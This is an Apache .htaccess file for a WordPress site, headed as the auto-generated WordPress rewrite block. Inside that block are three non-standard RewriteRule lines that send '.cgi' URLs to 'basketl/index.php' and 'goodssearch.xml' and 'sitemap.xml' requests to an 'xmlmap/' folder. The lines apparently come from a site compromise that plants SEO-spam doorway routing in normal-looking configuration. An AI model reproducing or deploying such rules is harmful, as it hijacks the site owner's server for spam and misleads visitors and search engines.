
# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^.*/[^-]+-(\d+)/.*.cgi$ basketl/index\.php?id=$1&%{QUERY_STRING} [L]
RewriteRule ^.*([a-z]+goodssearch\.xml)$  xmlmap/$1 [L]
RewriteRule ^.*(sitemap\.xml)$  xmlmap/$1 [L]

RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress